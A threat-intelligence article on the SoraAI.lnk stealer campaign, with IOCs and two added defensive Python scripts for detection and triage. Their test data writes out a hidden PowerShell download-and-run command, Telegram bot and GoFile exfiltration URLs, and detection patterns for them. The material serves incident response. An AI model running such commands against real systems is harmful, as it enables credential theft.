Malicious Actors Exploit SoraAI’s Popularity & GitHub to Distribute Malware
Threat actors are leveraging the growing popularity of OpenAI’s Sora, a cutting-edge video generation model, to distribute malicious software.
Disguised as a legitimate shortcut file named “SoraAI.lnk,” this information-stealing malware mimics the branding of Sora to trick users into initiating a multi-stage attack chain.
Deceptive Tactics Target OpenAI’s Sora Brand
First reported on VirusTotal from Vietnam on May 21, 2025, the malware has since spread to multiple countries, though the exact number of affected individuals remains unclear.
This campaign highlights the increasing use of social engineering tactics to exploit user trust in well-known AI tools, with attackers hosting their malicious payloads on trusted platforms like GitHub to evade suspicion.
The attack begins when a user double-clicks the “SoraAI.lnk” shortcut, whose target invokes cmd.exe with a predefined argument that launches a hidden PowerShell process.
This process downloads a malicious batch file, “a.bat,” from a GitHub repository into the victim’s Temp folder.

The script then runs the download of the additional payloads in a retry loop, so the infection proceeds even if the first attempts fail.
Subsequent stages run further batch files, “f.bat” and “1.bat,” which install legitimate Python packages such as requests, pywin32, and cryptography and finally launch a malicious Python script, “python.py.”
This script establishes persistence by placing itself in the startup folder and targets a wide array of sensitive data.
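The infection chain above leaves a distinctive process tree: a user-launched cmd.exe handing off to a hidden PowerShell that downloads into Temp, and later a python.exe parent for netsh. The following is an added detection example, not code from the K7 Labs report, run over constructed process-creation records shaped like Sysmon Event ID 1; the field names, paths, PIDs and the placeholder GitHub URL are assumptions.

```python
# Added example (not code from the K7 Labs report): detection logic for the
# SoraAI.lnk infection chain, run over constructed process-creation records
# shaped like Sysmon Event ID 1. Field names, paths and PIDs are assumptions.
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str    # full path of the new process
    cmdline: str  # command line as logged


# Constructed telemetry approximating the chain described on this page:
# explorer.exe starts the LNK target (cmd.exe), which launches a hidden
# PowerShell that drops a.bat into %TEMP%; later python.exe runs netsh to
# read Wi-Fi profiles. The GitHub URL below is a placeholder, not the IOC.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c powershell -w hidden -c \"iwr https://github.com/example/a/raw/a.bat"
              " -OutFile $env:TEMP\\a.bat; & $env:TEMP\\a.bat\""),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -c \"iwr https://github.com/example/a/raw/a.bat"
              " -OutFile C:\\Users\\u\\AppData\\Local\\Temp\\a.bat; & C:\\Users\\u\\AppData\\Local\\Temp\\a.bat\""),
    ProcEvent(400, 300, r"C:\Windows\System32\cmd.exe",
              r"cmd /c C:\Users\u\AppData\Local\Temp\a.bat"),
    ProcEvent(500, 400, r"C:\Users\u\AppData\Local\Programs\Python\python.exe",
              r"python.exe C:\Users\u\AppData\Local\Temp\python.py"),
    ProcEvent(600, 500, r"C:\Windows\System32\netsh.exe", "netsh wlan show profile"),
    # Benign admin activity that must not fire.
    ProcEvent(700, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(800, 700, r"C:\Windows\System32\netsh.exe", "netsh interface show interface"),
]

HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
DOWNLOAD_VERB = re.compile(
    r"\b(?:iwr|invoke-webrequest|downloadfile|downloadstring|start-bitstransfer|curl|wget)\b", re.I)
TEMP_PATH = re.compile(r"\$env:temp|\\temp\\", re.I)
WIFI_PROFILES = re.compile(r"\bwlan\s+show\s+profile", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid) pairs for events matching the chain's stages."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        name = basename(e.image)
        pname = basename(parent.image) if parent else ""
        # Stage 1: a user-launched cmd.exe (explorer.exe parent, as for a
        # double-clicked LNK) whose arguments hand off to PowerShell.
        if name == "cmd.exe" and pname == "explorer.exe" and "powershell" in e.cmdline.lower():
            findings.append(("lnk_style_cmd_to_powershell", e.pid))
        # Stage 2: hidden-window PowerShell downloading into the Temp folder.
        if (name == "powershell.exe" and HIDDEN_WINDOW.search(e.cmdline)
                and DOWNLOAD_VERB.search(e.cmdline) and TEMP_PATH.search(e.cmdline)):
            findings.append(("hidden_ps_download_to_temp", e.pid))
        # Stage 3: netsh reading Wi-Fi profiles on behalf of a Python process.
        if name == "netsh.exe" and WIFI_PROFILES.search(e.cmdline) and pname.startswith("python"):
            findings.append(("python_spawned_wifi_profile_dump", e.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Stage 1 fires on any explorer-launched cmd.exe that mentions PowerShell, which also covers legitimate shortcuts that do so; treat it as a weak signal that becomes strong only when stage 2 follows from the same process tree. Stage 2 and 3 are tighter and are the ones worth alerting on by themselves.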
Multi-Stage Attack Chain
It extracts browser cookies, passwords, and profiles from applications like Chrome, Firefox, and Opera, decrypting encrypted data using a custom “chrome_decrypt.dll.”
Additionally, it collects system information, Wi-Fi credentials via the netsh tool, cryptocurrency wallet details, and configuration data from popular gaming platforms such as Steam and Epic Games.
The harvested data is compressed into a zip file, named with the victim’s country and IP, and exfiltrated via a Telegram bot API.

For files larger than 49 MB, the malware instead uploads them to the external hosting service GoFile.io, notifies the attackers through Telegram, and deletes the local copies to cover its tracks.
This intricate attack chain also scavenges files with common extensions (.pdf, .jpg, .txt) and data from critical directories like Downloads and Documents, amplifying the potential damage to victims through identity theft or further exploitation.
Distinguishing legitimate from malicious resources is essential: a file hosted on a trusted platform such as GitHub is no guarantee of safety.
Users should download files only from trusted sources and verify a file's origin and type before executing it, since the data theft performed by such malware cannot be undone once it has run.
Staying informed about current attack methodologies and deploying a robust antivirus solution such as K7 Total Security can significantly reduce the risk.
According to the report, K7 Labs detects this information stealer at multiple stages of the infection chain.
Indicators of Compromise (IOCs)
File Name | MD5 Hash
---|---
SoraAI.lnk | D4B1F86B0D722935BDA299D37F7A2663
a.bat | 8358AF316ACDFD449D9E9F78FFC57500
f.bat | 596C75805BE5AD3B44A0AAFA9E94DFC2
1.bat | BE13272715927422332A14DBFE32CFF7
python.py | 9BABDE0DD32C1AB24EFB2C4D25BD0B10
chrome_decrypt.dll | ED38E7C7E54B87841BDB013203EBF01B

Payload URL (defanged): hxxp[:]//github.com/ArimaTheH/a/raw/refs/heads/main/f.zip
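The stealer's persistence location (the user's Startup folder) and its exfiltration endpoints (the Telegram bot API and GoFile) give a responder two cheap host-side checks alongside the hashes above. The following is an added triage example, not code from the K7 Labs report: it walks a directory, compares each file's MD5 against the IOC list on this page, and greps any script it finds for those endpoints. The directory it scans in the demo is a constructed temporary stand-in for the Startup folder, and the sample file contents, including the bot token, are constructed.

```python
# Added example (not code from the K7 Labs report): host triage for the
# persistence and exfiltration described above. It checks a directory (a
# constructed stand-in for the user's Startup folder) for files whose MD5
# matches the page's IOCs and for scripts that reach the Telegram bot API or
# GoFile. Sample file contents, the bot token and the paths are constructed.
import hashlib
import os
import re
import tempfile

# MD5 values from the IOC table on this page (lower-cased for comparison).
IOC_MD5 = {
    "d4b1f86b0d722935bda299d37f7a2663": "SoraAI.lnk",
    "8358af316acdfd449d9e9f78ffc57500": "a.bat",
    "596c75805be5ad3b44a0aafa9e94dfc2": "f.bat",
    "be13272715927422332a14dbfe32cff7": "1.bat",
    "9babde0dd32c1ab24efb2c4d25bd0b10": "python.py",
    "ed38e7c7e54b87841bdb013203ebf01b": "chrome_decrypt.dll",
}

# Telegram bot tokens have the form "<numeric id>:<35 token chars>"; the
# stealer sends the zip via the bot API (sendDocument). GoFile's public upload
# flow uses getServer and <server>.gofile.io/uploadFile.
TELEGRAM_BOT_API = re.compile(
    r"api\.telegram\.org/bot\d{8,10}:[A-Za-z0-9_-]{35}/send(?:Document|Message)")
GOFILE_UPLOAD = re.compile(r"(?:[a-z0-9-]+\.)?gofile\.io/(?:uploadFile|getServer)", re.I)
SCRIPT_EXT = {".py", ".bat", ".cmd", ".lnk", ".vbs", ".ps1"}


def default_startup_dir() -> str:
    """Per-user Startup folder on Windows, where python.py copies itself."""
    return os.path.join(os.environ.get("APPDATA", ""),
                        r"Microsoft\Windows\Start Menu\Programs\Startup")


def md5_of(path: str) -> str:
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def triage_dir(directory: str, ioc_md5=IOC_MD5):
    """Return (rule, filename, detail) findings for every file under directory."""
    findings = []
    for root, _, files in os.walk(directory):
        for fn in sorted(files):
            path = os.path.join(root, fn)
            digest = md5_of(path)
            if digest in ioc_md5:
                findings.append(("ioc_hash_match", fn, ioc_md5[digest]))
            if os.path.splitext(fn)[1].lower() not in SCRIPT_EXT:
                continue
            # Any script in a Startup folder deserves a look; then grep it for
            # the exfiltration endpoints the page describes.
            findings.append(("script_in_startup", fn, None))
            with open(path, "r", encoding="utf-8", errors="ignore") as f:
                text = f.read()
            if TELEGRAM_BOT_API.search(text):
                findings.append(("telegram_bot_exfil", fn, None))
            if GOFILE_UPLOAD.search(text):
                findings.append(("gofile_upload", fn, None))
    return findings


def demo():
    """Build a constructed Startup folder in a temp dir and triage it."""
    d = tempfile.mkdtemp(prefix="startup_demo_")
    fake_token = "1234567890:" + "A" * 35  # constructed, not a real bot token
    with open(os.path.join(d, "python.py"), "w", encoding="utf-8") as f:
        f.write(f"URL = 'https://api.telegram.org/bot{fake_token}/sendDocument'\n"
                "BIG = 'https://store1.gofile.io/uploadFile'\n")
    with open(os.path.join(d, "a.bat"), "w", encoding="utf-8") as f:
        f.write("@echo constructed stand-in\n")
    with open(os.path.join(d, "notes.txt"), "w", encoding="utf-8") as f:
        f.write("benign file\n")
    # Constructed content cannot match the real IOC hashes, so register the
    # stand-in's own hash to exercise the hash rule.
    iocs = dict(IOC_MD5)
    iocs[md5_of(os.path.join(d, "a.bat"))] = "a.bat (constructed stand-in)"
    return triage_dir(d, iocs)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real host, call `triage_dir(default_startup_dir())`. The hash check only catches these exact samples, since a recompile or a one-byte change produces new digests; the script-in-Startup and endpoint checks are the durable part, and a Telegram bot token found in a startup script is itself actionable, because the attacker's chat ID and uploads can be queried with it during incident response.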